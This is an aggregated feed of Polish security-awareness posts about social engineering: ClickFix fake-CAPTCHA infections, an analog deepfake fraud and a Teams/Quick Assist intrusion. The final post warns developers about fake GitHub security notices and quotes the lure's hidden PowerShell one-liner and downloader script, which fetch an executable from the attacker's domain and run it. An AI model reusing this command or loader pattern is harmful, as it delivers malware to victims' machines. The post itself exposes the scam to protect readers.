#socjotechnika — Public Fediverse posts
Live and recent posts from across the Fediverse tagged #socjotechnika, aggregated by home.social.
-
Wchodzisz na stronę juwenaliów… a tu taka niespodzianka [możliwa infekcja malware]
Patryk przesłał nam informację o infekcji strony rzeszowskiejuwenalia[.]pl Nasz czytelnik odwiedził tę stronę i natknął się na taki widok: Sam obrazek jeszcze niewiele zdradza, ale… po kliknięciu strona prosiła aby nacisnąć kolejno klawisze: Windows+R, Ctrl+V oraz enter. O co tutaj technicznie chodzi? Po kliknięciu: I’m not a robot – strona...
#WBiegu #Awareness #Clickfix #Infekcja #Malware #Socjotechnika
https://sekurak.pl/wchodzisz-na-strone-juwenaliow-a-tu-taka-niespodzianka-mozliwa-infekcja-malware/
-
Wchodzisz na stronę juwenaliów… a tu taka niespodzianka [możliwa infekcja malware]
Patryk przesłał nam informację o infekcji strony rzeszowskiejuwenalia[.]pl Nasz czytelnik odwiedził tę stronę i natknął się na taki widok: Sam obrazek jeszcze niewiele zdradza, ale… po kliknięciu strona prosiła aby nacisnąć kolejno klawisze: Windows+R, Ctrl+V oraz enter. O co tutaj technicznie chodzi? Po kliknięciu: I’m not a robot – strona...
#WBiegu #Awareness #Clickfix #Infekcja #Malware #Socjotechnika
https://sekurak.pl/wchodzisz-na-strone-juwenaliow-a-tu-taka-niespodzianka-mozliwa-infekcja-malware/
-
Wchodzisz na stronę juwenaliów… a tu taka niespodzianka [możliwa infekcja malware]
Patryk przesłał nam informację o infekcji strony rzeszowskiejuwenalia[.]pl Nasz czytelnik odwiedził tę stronę i natknął się na taki widok: Sam obrazek jeszcze niewiele zdradza, ale… po kliknięciu strona prosiła aby nacisnąć kolejno klawisze: Windows+R, Ctrl+V oraz enter. O co tutaj technicznie chodzi? Po kliknięciu: I’m not a robot – strona...
#WBiegu #Awareness #Clickfix #Infekcja #Malware #Socjotechnika
https://sekurak.pl/wchodzisz-na-strone-juwenaliow-a-tu-taka-niespodzianka-mozliwa-infekcja-malware/
-
Wchodzisz na stronę juwenaliów… a tu taka niespodzianka [możliwa infekcja malware]
Patryk przesłał nam informację o infekcji strony rzeszowskiejuwenalia[.]pl Nasz czytelnik odwiedził tę stronę i natknął się na taki widok: Sam obrazek jeszcze niewiele zdradza, ale… po kliknięciu strona prosiła aby nacisnąć kolejno klawisze: Windows+R, Ctrl+V oraz enter. O co tutaj technicznie chodzi? Po kliknięciu: I’m not a robot – strona...
#WBiegu #Awareness #Clickfix #Infekcja #Malware #Socjotechnika
https://sekurak.pl/wchodzisz-na-strone-juwenaliow-a-tu-taka-niespodzianka-mozliwa-infekcja-malware/
-
Wchodzisz na stronę juwenaliów… a tu taka niespodzianka [możliwa infekcja malware]
Patryk przesłał nam informację o infekcji strony rzeszowskiejuwenalia[.]pl Nasz czytelnik odwiedził tę stronę i natknął się na taki widok: Sam obrazek jeszcze niewiele zdradza, ale… po kliknięciu strona prosiła aby nacisnąć kolejno klawisze: Windows+R, Ctrl+V oraz enter. O co tutaj technicznie chodzi? Po kliknięciu: I’m not a robot – strona...
#WBiegu #Awareness #Clickfix #Infekcja #Malware #Socjotechnika
https://sekurak.pl/wchodzisz-na-strone-juwenaliow-a-tu-taka-niespodzianka-mozliwa-infekcja-malware/
-
Protokół „Figurant”: analogowy deepfake
AI daje przestępcom niesamowite możliwości, dzięki którym kilkoma kliknięciami mogą wygenerować wizerunek osoby decyzyjnej i nakłonić pracowników z odpowiednimi dostępami do przelania ogromnych sum na konta słupów. Jednak przed erą tzw. deepfake’ów był człowiek, który używał do wyłudzeń Skype’a, ale twarz „kradł” całkowicie analogowo. Pan Prezes W marcu 2006 roku...
#Teksty #Deepfake #Oszustwo #Scam #Socjotechnika #Wyłudzanie
-
Protokół „Figurant”: analogowy deepfake
AI daje przestępcom niesamowite możliwości, dzięki którym kilkoma kliknięciami mogą wygenerować wizerunek osoby decyzyjnej i nakłonić pracowników z odpowiednimi dostępami do przelania ogromnych sum na konta słupów. Jednak przed erą tzw. deepfake’ów był człowiek, który używał do wyłudzeń Skype’a, ale twarz „kradł” całkowicie analogowo. Pan Prezes W marcu 2006 roku...
#Teksty #Deepfake #Oszustwo #Scam #Socjotechnika #Wyłudzanie
-
Protokół „Figurant”: analogowy deepfake
AI daje przestępcom niesamowite możliwości, dzięki którym kilkoma kliknięciami mogą wygenerować wizerunek osoby decyzyjnej i nakłonić pracowników z odpowiednimi dostępami do przelania ogromnych sum na konta słupów. Jednak przed erą tzw. deepfake’ów był człowiek, który używał do wyłudzeń Skype’a, ale twarz „kradł” całkowicie analogowo. Pan Prezes W marcu 2006 roku...
#Teksty #Deepfake #Oszustwo #Scam #Socjotechnika #Wyłudzanie
-
Protokół „Figurant”: analogowy deepfake
AI daje przestępcom niesamowite możliwości, dzięki którym kilkoma kliknięciami mogą wygenerować wizerunek osoby decyzyjnej i nakłonić pracowników z odpowiednimi dostępami do przelania ogromnych sum na konta słupów. Jednak przed erą tzw. deepfake’ów był człowiek, który używał do wyłudzeń Skype’a, ale twarz „kradł” całkowicie analogowo. Pan Prezes W marcu 2006 roku...
#Teksty #Deepfake #Oszustwo #Scam #Socjotechnika #Wyłudzanie
-
Protokół „Figurant”: analogowy deepfake
AI daje przestępcom niesamowite możliwości, dzięki którym kilkoma kliknięciami mogą wygenerować wizerunek osoby decyzyjnej i nakłonić pracowników z odpowiednimi dostępami do przelania ogromnych sum na konta słupów. Jednak przed erą tzw. deepfake’ów był człowiek, który używał do wyłudzeń Skype’a, ale twarz „kradł” całkowicie analogowo. Pan Prezes W marcu 2006 roku...
#Teksty #Deepfake #Oszustwo #Scam #Socjotechnika #Wyłudzanie
-
Jak Microsoft Teams + Quick Assist umożliwiły atakującym dostęp do firmowego komputera? Relacja z obsługi incydentu od naszego czytelnika.
Opiszę tu prawdziwy incydent, jaki miałem ostatnio okazję analizować. Zdarzył się w firmie poza Polską, gdzie standardowym językiem komunikacji był angielski, więc anglojęzyczni atakujący łatwiej podszyli się pod support… Być może pamiętacie ostrzeżenia dotyczące wykorzystania Quick Assist – Microsoftowego rozwiązania do zdalnej pomocy – coś jak TeamViewer czy AnyDesk, tylko...
#WBiegu #Incydent #Microsoft #Socjotechnika #Teams #Zdalnydostep
-
Uwaga programiści! Ktoś wysyła cwane komunikaty przez GitHuba
Jak informują nas programiści posiadający konto na GitHubie, od wczoraj otrzymują powiadomienia o następującej treści:
fot. przesłana prze z Jana
Hey there!
We have detected a security vulnerability in your repository. Please contact us at https://github-scanner[.]com to get more information on how to fix this issue.
Best regards,
Github Security Team
Powiadomienia są triggerowane przez dodanie (a następnie usunięcie) tzw. “issue” do projektu. Gdzie prowadzi link? Ano do strony, która próbuje na programiście wykonać atak “na CAPTCHA” opisywany przez nas ponad 2 tygodnie temu w ramach CyberAlertu. Ofiara widzi to:Kliknięcie w przycisk na pierwszym ekranie kopiuje do schowka ofiary następującą komendę:
powershell.exe -w hidden -Command "iex (iwr 'https://github-scanner[.]com/download.txt').Content" # "✅ ''I am not a robot - reCAPTCHA Verification ID: XXXXXX"
A zastosowanie się do instrukcji widocznej na kolejnym ekranie uruchamia powyższą komendę, czyli w konsekwencji następujący kod infekujący komputer ofiary złośliwym oprogramowaniem:
$webClient = New-Object System.Net.WebClient
$url1 = "https://github-scanner[.]com/l6E.exe"
$filePath1 = "$env:TEMP\SysSetup.exe"
$webClient.DownloadFile($url1, $filePath1)
Start-Process -FilePath $env:TEMP\SysSetup.exe
Szczerze mówiąc, trochę nas dziwi dobór ofiar. Programiści akurat są świadomi, co robi skrót WIN+R. Z drugiej jednak strony, zainfekować programistę popularnego projektu na GitHubie to jak wygrać w totka…
Na jakie jeszcze ataki powinni uważać programiści?
Jeśli chcesz poznać wszystkie ataki, na które powinni być wyczuleni programiści aplikacji webowych, to wpadnij na nasze szkolenie z “Atakowanie i Ochrony Webaplikacji”. To dwa dni pełne praktyki [...]#Ataki #Captcha #GitHub #Malware #Phishing #Programista #Programowanie #Socjotechnika
https://niebezpiecznik.pl/post/uwaga-programisci-ktos-wysyla-cwane-komunikaty-przez-githuba/